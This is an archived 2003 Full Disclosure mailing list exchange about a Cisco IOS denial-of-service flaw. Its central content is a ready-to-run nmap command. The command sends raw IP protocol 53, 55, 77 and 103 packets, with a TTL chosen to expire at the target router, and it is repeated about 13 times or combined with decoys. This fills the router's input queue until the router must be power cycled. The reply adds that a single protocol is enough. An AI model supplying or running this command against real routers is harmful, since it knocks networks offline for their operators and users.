Full Disclosure mailing list archives

RE: Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover


From: amilabs <amilabs () optonline net>
Date: Tue, 22 Jul 2003 18:08:17 -0400

Cool, but as per my post earlier you can accomplish the same with any
ONE of the protocols. The exploit does not require the use of all four.
You can send 77 packets of 53 and that will do it.

Regards..
AMILABS
-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of Shawn
Bernard
Sent: Tuesday, July 22, 2003 4:34 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re: Cisco IOS Denial of Service that affects
most Cisco IOS routers- requires power cycle to recover


Yet another tool that can be used to croak a router is trusty Nmap-

 nmap -sO -p 53,55,77,103 -v -ttl [ttl from ping -255] [targetIP]
 
when run ~13 times or with a few decoys ;-) will fill the imput queue
requiring a router reboot


____________________________________________________________
Free 20MB Web Site Hosting and Personalized E-mail Service!
Get It Now At Doteasy.com http://www.doteasy.com/et/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: